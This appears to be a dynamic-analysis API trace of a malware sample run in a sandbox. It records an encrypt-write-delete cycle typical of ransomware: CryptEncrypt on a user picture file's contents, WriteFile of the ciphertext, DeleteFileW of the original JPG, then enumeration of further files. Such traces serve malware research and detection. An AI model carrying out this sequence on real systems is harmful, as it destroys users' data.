[0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.882] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.882] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.882] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0095.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.883] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.932] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0095.933] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x123f1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x12400) returned 1 [0095.933] CharLowerBuffW (in: lpsz="byte[74753]", cchLength=0xb | out: lpsz="byte[74753]") returned 0xb [0095.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cada8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0095.933] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ac408*, pdwDataLen=0x144e538*=0x123f1, dwBufLen=0x12400 | out: pbData=0x49ac408*, pdwDataLen=0x144e538*=0x12400) returned 1 [0095.933] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.933] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.933] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.934] WriteFile (in: hFile=0x258, lpBuffer=0x4528418*, nNumberOfBytesToWrite=0x12400, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4528418*, lpNumberOfBytesWritten=0x144ef3c*=0x12400, lpOverlapped=0x0) returned 1 [0095.936] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0095.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0095.937] CryptDestroyKey (hKey=0x41ac180) returned 1 [0095.937] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.937] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0095.937] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0095.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.937] FreeLibrary (hLibModule=0x756e0000) returned 1 [0095.938] CloseHandle (hObject=0x298) returned 1 [0095.938] CloseHandle (hObject=0x258) returned 1 [0095.946] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg", lpFilePart=0x0) returned 0x28 [0095.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0095.946] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z6qa.jpg")) returned 0x20 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0095.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.947] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b717770, ftCreationTime.dwHighDateTime=0x1d5e73f, ftLastAccessTime.dwLowDateTime=0xdce5a1d0, ftLastAccessTime.dwHighDateTime=0x1d5e252, ftLastWriteTime.dwLowDateTime=0xdce5a1d0, ftLastWriteTime.dwHighDateTime=0x1d5e252, nFileSizeHigh=0x0, nFileSizeLow=0x123f1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="z6qa.jpg", cAlternateFileName="")) returned 0x41ac740 [0095.947] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z6qa.jpg")) returned 1 [0095.994] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b717770, ftCreationTime.dwHighDateTime=0x1d5e73f, ftLastAccessTime.dwLowDateTime=0xdce5a1d0, ftLastAccessTime.dwHighDateTime=0x1d5e252, ftLastWriteTime.dwLowDateTime=0xdce5a1d0, ftLastWriteTime.dwHighDateTime=0x1d5e252, nFileSizeHigh=0x0, nFileSizeLow=0x123f1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="z6qa.jpg", cAlternateFileName="")) returned 0 [0095.995] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0095.995] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0095.995] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0095.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9380 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0095.996] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0095.996] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0095.996] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0095.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0095.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0095.996] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0095.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0095.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0095.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0095.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0095.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0095.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0095.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0095.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0095.998] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0095.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0095.998] 